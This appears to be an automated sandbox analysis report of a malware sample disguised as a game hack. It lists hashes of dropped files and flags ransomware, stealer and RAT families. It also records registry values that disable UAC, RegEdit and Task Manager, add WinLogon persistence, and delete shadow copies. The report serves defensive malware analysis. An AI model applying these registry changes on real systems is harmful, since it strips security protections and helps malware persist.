SHA256 15a11f6b9e9d0b7c07d70dbf64d21bbd302d7465107d0c766af2bb04788aa29a
SHA512 5ed0361f5173b0b61706d9a2621493d755a4956d2a1ca98adaf5fef7efd04ee102f08574d26a1663dca8da63febd84fd64e6d259d2f7deccb80a1194b21b1c63

C:\Users\Admin\AppData\Local\Temp\RarSFX0\SpLiTTer.Exe

MD5 ac3a8f998ba934b14b4b849dff353b4e
SHA1 f3f1f33e93b31a66d88a00040fb9901065076c6a
SHA256 165071c27989319cf5dbdebf797952a8659e1db273fcf383285337ff1f040d00
SHA512 131935b3db119ccf3e95e553fcf74896ed08fa8e7bec4ff078dd193c4a64855caab1a297da758e053afa8628e36b32ba62babc82d602bbea4a0634e046b41bc6

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE

MD5 267f15ab62194ac91ea3149a41f09f2c
SHA1 da061349a63a44b4150f3c09a6eab16240dd5ed9
SHA256 0d842bb8fee14dd7c45eea29b0400675cafe1525f77f16d84755885b222b9f0b
SHA512 959de7a6f8aa16452c10664e0124b51c48854a2805f0d9bc9c7d654a342c4002fa68ceb02b28a7e47c1b6c36b2ed949eb134c8150b9a971354765fb78f2dfdca

C:\Windows\directx.sys

MD5 e08da1f05efb3b6d438640a92d92761c
SHA1 cd8f9ad002181ebf87a3625734498ddc4a50ec59
SHA256 b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52
SHA512 e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

C:\Windows\directx.sys

MD5 f885d87964363b63dd02fa0764914e34
SHA1 f4040260ce0513af83c51129835e39fc1dc5b8cd
SHA256 6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f
SHA512 054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

memory/2112-240-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4260-251-0x00000000720F0000-0x00000000727DE000-memory.dmp

C:\Windows\svchost.com

MD5 437a6ecbf6db08034276cea58075b0b0
SHA1 4d90c0b3de4448d364d25676869e75aa2971f5b7
SHA256 15c6723f03081ac3f9a26c2f047460b326808fe46c749d02cc5486b38b6ad50d
SHA512 0169029b660d9f47c466229c61d6c29a0531f984ce576b89522337b31c4abafb2083a71b7709b4550b0e007f53d5fd1ac21e8c4b14a9d27ec991b7637da27e4c

C:\odt\OFFICE~1.EXE

MD5 8dcc786af262a4ccda6ccca63b6e2b2d
SHA1 ee3328ad6e86b75a0887f65211f4476c2f4dfa62
SHA256 2f7f647ec72c8f420660864556ed4d84abc20a8c5922f0e269f89be83963b461
SHA512 347fc17e05947fe51b0b2badf6d4aa2cec31e24922d3e9adb7eb4eb9e029a6e0f9c37008a60c810b923e4fccb5de3d1cee4e7b44ea66b4a90581628409acd4fa

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

MD5 8a8413b550609e872911208795b17a60
SHA1 2fc14dd7825f4f28d0b3f15e5ea3cc0cbdd1facd
SHA256 589b3ac3b87557ef5f279933af7ae3c5e554050edb704528bdce165cfcbc16e3
SHA512 517595086c9c598c11fb0f9de0e8c7ac17d295a21e6f8bf2d9dccb6c92ba2ffbcd7fd4a860de485965164f1248c6f43529302f06d5b1571057e8602b2066d318

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 f00499d06808beac60313cc5180d0a3f
SHA1 71d40128e284496e16484a347356ae009e0b1251
SHA256 411a5fe8b169172242afd1fcc326c53a0db8f5508da1f3dbe1d9ba7f88c2a800
SHA512 909e7e58a014b06e04df71ab5c97fb981a6abcc83f7cabf02a34f7277ddb2c7cdb403fac685aeece132011e18d8256dc69a4d9a8b4af50c0337d7f76a42a7750

C:\Users\Admin\AppData\Local\Temp\RarSFX0\SpLiTTer.Exe

MD5 cb960c030f900b11e9025afea74f3c0c
SHA1 bbdcad9527c814a9e92cdc1ee27ae9db931eb527
SHA256 91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99
SHA512 9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

memory/3244-264-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2252-274-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3636-279-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1732-290-0x0000000000560000-0x0000000000561000-memory.dmp

memory/1732-294-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1460-292-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/2652-286-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2260-288-0x0000000000400000-0x000000000041B000-memory.dmp

memory/964-281-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/2112-273-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2652-270-0x0000000000550000-0x0000000000551000-memory.dmp

memory/4696-293-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2632-297-0x0000000000400000-0x000000000042E000-memory.dmp

memory/428-300-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4204-299-0x0000000000880000-0x0000000000963000-memory.dmp

memory/3708-303-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2632-304-0x00000000001F0000-0x00000000001FF000-memory.dmp

memory/2212-301-0x000000006FCA0000-0x0000000070250000-memory.dmp

memory/964-295-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/2212-259-0x000000006FCA0000-0x0000000070250000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\u.wnry

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\t.wnry

MD5 5dcaac857e695a65f5c3ef1441a73a8f
SHA1 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd
SHA256 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6
SHA512 06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\r.wnry

MD5 3e0020fc529b1c2a061016dd2469ba96
SHA1 c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
SHA256 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
SHA512 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_vietnamese.wnry

MD5 8419be28a0dcec3f55823620922b00fa
SHA1 2e4791f9cdfca8abf345d606f313d22b36c46b92
SHA256 1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8
SHA512 8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_turkish.wnry

MD5 531ba6b1a5460fc9446946f91cc8c94b
SHA1 cc56978681bd546fd82d87926b5d9905c92a5803
SHA256 6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415
SHA512 ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_swedish.wnry

MD5 c7a19984eb9f37198652eaf2fd1ee25c
SHA1 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae
SHA256 146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4
SHA512 43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_spanish.wnry

MD5 8d61648d34cba8ae9d1e2a219019add1
SHA1 2091e42fc17a0cc2f235650f7aad87abf8ba22c2
SHA256 72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1
SHA512 68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_slovak.wnry

MD5 c911aba4ab1da6c28cf86338ab2ab6cc
SHA1 fee0fd58b8efe76077620d8abc7500dbfef7c5b0
SHA256 e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729
SHA512 3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_russian.wnry

MD5 452615db2336d60af7e2057481e4cab5
SHA1 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6
SHA256 02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078
SHA512 7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_romanian.wnry

MD5 313e0ececd24f4fa1504118a11bc7986
SHA1 e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d
SHA256 70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1
SHA512 c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry

MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry

MD5 e79d7f2833a9c2e2553c7fe04a1b63f4
SHA1 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
SHA256 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
SHA512 e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry

MD5 ff70cc7c00951084175d12128ce02399
SHA1 75ad3b1ad4fb14813882d88e952208c648f1fd18
SHA256 cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a
SHA512 f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry

MD5 c33afb4ecc04ee1bcc6975bea49abe40
SHA1 fbea4f170507cde02b839527ef50b7ec74b4821f
SHA256 a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536
SHA512 0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry

MD5 6735cb43fe44832b061eeb3f5956b099
SHA1 d636daf64d524f81367ea92fdafa3726c909bee1
SHA256 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0
SHA512 60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry

MD5 b77e1221f7ecd0b5d696cb66cda1609e
SHA1 51eb7a254a33d05edf188ded653005dc82de8a46
SHA256 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e
SHA512 f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry

MD5 30a200f78498990095b36f574b6e8690
SHA1 c4b1b3c087bd12b063e98bca464cd05f3f7b7882
SHA256 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07
SHA512 c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry

MD5 3788f91c694dfc48e12417ce93356b0f
SHA1 eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
SHA256 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4
SHA512 b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry

MD5 fb4e8718fea95bb7479727fde80cb424
SHA1 1088c7653cba385fe994e9ae34a6595898f20aeb
SHA256 e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9
SHA512 24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry

MD5 3d59bbb5553fe03a89f817819540f469
SHA1 26781d4b06ff704800b463d0f1fca3afd923a9fe
SHA256 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA512 95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry

MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry

MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry

MD5 fe68c2dc0d2419b38f44d83f2fcf232e
SHA1 6c6e49949957215aa2f3dfb72207d249adf36283
SHA256 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512 941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry

MD5 7a8d499407c6a647c03c4471a67eaad7
SHA1 d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA256 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512 608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry

MD5 2c5a3b81d5c4715b7bea01033367fcb5
SHA1 b548b45da8463e17199daafd34c23591f94e82cd
SHA256 a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry

MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry

MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry

MD5 2efc3690d67cd073a9406a25005f7cea
SHA1 52c07f98870eabace6ec370b7eb562751e8067e9
SHA256 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA512 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\minuscrypt_crypted.exe

MD5 3a68a2cbeb827588f3749568b121a79b
SHA1 a40fc3b0c547826353088baf247b379f1e10f25d
SHA256 2ab209c8b13fc820c0f2cd15de422053e94e2ca02b939ff97eeb2abceb5bb810
SHA512 7ab8bb1605cfed214d05c6dac5dc05df0b66c90e7abe67629e8c879483d5f2784edae832f48acfc92c968a3da1f13e76e5db699890ed85b0c00bb551e0e70b7d

memory/4260-309-0x0000000005060000-0x0000000005070000-memory.dmp

memory/1460-308-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 dfb746ce95fd4c6ff5cfa5f6ec5d734b
SHA1 13e0bc9fca29c327d041b0033948c5426471cd03
SHA256 5b17b805e68c6cf4c80b8dcdf3b5f1685b3e45d008eb5bdefd990ccd4e697c0e
SHA512 02a7ec280032cc87b3605688e66be90aa4b64f0c7badae74649c901a1ae6bdb76d45a05ffac90e41cc275fb9fd38cb779caa42223d35e0aa6f17a081dd5f5080

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

MD5 93f33b83f1f263e2419006d6026e7bc1
SHA1 1a4b36c56430a56af2e0ecabd754bf00067ce488
SHA256 ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4
SHA512 45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

memory/2212-310-0x0000000002A20000-0x0000000002A30000-memory.dmp

memory/2212-311-0x0000000002A20000-0x0000000002A30000-memory.dmp

memory/4064-312-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2112-315-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Windows\directx.sys

MD5 81f842c9e1e74a177048c8954514ebb8
SHA1 2ae3ea4bb61941f1d463bc4cc3af536078c31e0f
SHA256 c86507750a7b599cb480f4107a08df30407ad5a668218e0d51d6c52c885bf2bd
SHA512 9cabdd55a3edf3b78f6c92fc7ae250ea40cf0acbd26be6a18e7c443fd2e32a14f344f03f0916edd50c462305b2d07f6cad5314f65a53be95a4466c1604851621

memory/964-343-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

MD5 ff5e1f27193ce51eec318714ef038bef
SHA1 b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6
SHA256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
SHA512 c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

memory/3844-355-0x0000000000490000-0x0000000000491000-memory.dmp

memory/2620-346-0x0000000000400000-0x00000000004CE000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-01-09 22:08

Reported

2024-01-09 22:30

Platform

win10v2004-20231222-en

Max time kernel

592s

Max time network

596s

Command Line

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

Signatures

Cerber

ransomware cerber

DcRat

rat infostealer dcrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

HawkEye

keylogger trojan stealer spyware hawkeye

Maze

trojan ransomware maze

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A

Neshta

persistence spyware neshta

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Ramnit

trojan spyware stealer worm banker ramnit

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A

Wannacry

ransomware worm wannacry

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Contacts a large (1143) amount of remote hosts

discovery

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
